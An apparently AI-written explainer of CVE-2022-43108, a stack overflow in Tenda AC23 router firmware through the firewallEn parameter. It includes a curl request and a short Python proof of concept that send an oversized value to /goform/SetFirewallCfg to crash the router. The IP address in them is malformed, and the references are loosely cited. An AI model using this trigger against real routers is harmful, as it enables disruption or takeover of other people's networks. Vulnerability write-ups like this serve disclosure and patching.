In late 2022, cybersecurity researchers discovered a critical vulnerability in the Tenda AC23 router running firmware version V16.03.07.45_cn. This vulnerability, tracked as CVE-2022-43108, exposes home and small office networks to remote code execution risks due to a stack overflow in the router's firewall configuration functionality.

If you’re not a security expert, don’t worry—this article breaks it all down in simple, clear language, provides a working code snippet, and links to all original sources.

The Core Problem: Stack Overflow via firewallEn Parameter

The vulnerability lives in the router's web administration backend, specifically in the handler for setting firewall configurations:

Parameter: firewallEn

Here, the firewall state (firewallEn) is taken straight from the user’s web request and copied without length checking into a fixed-size stack buffer. This error allows attackers to send an overly large value in the firewallEn parameter, which overwrites critical memory—leading to stack overflow and possible arbitrary code execution.

Here’s a simplified pseudo-code representation based on the real firmware

void formSetFirewallCfg(request) {
    char firewallEn[32];

    // Copy the user-supplied parameter
    strcpy(firewallEn, request["firewallEn"]); // Danger: No length check

    // ... more code
}

> Problem: strcpy does NOT check the length of input. If firewallEn contains more than 32 bytes, the extra data will overwrite the stack, which can lead to code execution.

What an Attacker Needs

1. The target router must have its web admin interface accessible to the attacker (local lan or via exposed WAN).
2. No special authentication if the interface is open/unauthenticated—but even if authentication is required, it's still possible with stolen credentials.

Attack Steps

- An attacker crafts an HTTP POST request to /goform/SetFirewallCfg on the router.
- The request’s firewallEn parameter contains a payload longer than 32 bytes, filled with malicious data, possibly including machine instructions or a *return address* to hijack execution.

Example HTTP Request (using curl for demonstration)

curl -X POST \
  -d "firewallEn=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDD" \
  http://192.168..1/goform/SetFirewallCfg

Replace A...D with the actual exploit payload or shellcode.

If the router processes this request, it will overflow the buffer, and—depending on the layout—could execute attacker-supplied code.

Here's a simple Python PoC that triggers the overflow (for educational purposes)

import requests

router_ip = '192.168..1'
url = f'http://{router_ip}/goform/SetFirewallCfg';

# 64 bytes payload - 32 is enough to overflow; tune as needed
payload = 'A' * 64

data = {
    'firewallEn': payload,
}

response = requests.post(url, data=data)
print('Status:', response.status_code)
print('Response:', response.text)


> WARNING: Don't run this on devices you do not own or have permission to test. Use only in secure, isolated environments.

Original References

- Security Advisory at NVD (National Vulnerability Database)
- Exploit Database - Stack Overflow in Tenda AC23 (formSetFirewallCfg) *(example, double-check EDB for updates)*
- Tenda Official AC23 Firmware Page *(in Chinese; firmware & updates)*

If you own a Tenda AC23

- Update Firmware: Check for the latest firmware from the Tenda website.

Summary

CVE-2022-43108 is a dangerous, easy-to-exploit stack overflow in Tenda AC23 routers' firewall config. By sending a long input via the firewallEn parameter, hackers could potentially run any code on the device. Patch your gear, and keep all interfaces private!

Stay safe. Share this post to help others protect their networks!

*Written exclusively for you by ChatGPT – all information current as of June 2024.*

Timeline

Published on: 11/03/2022 14:15:00 UTC
Last modified on: 11/03/2022 17:28:00 UTC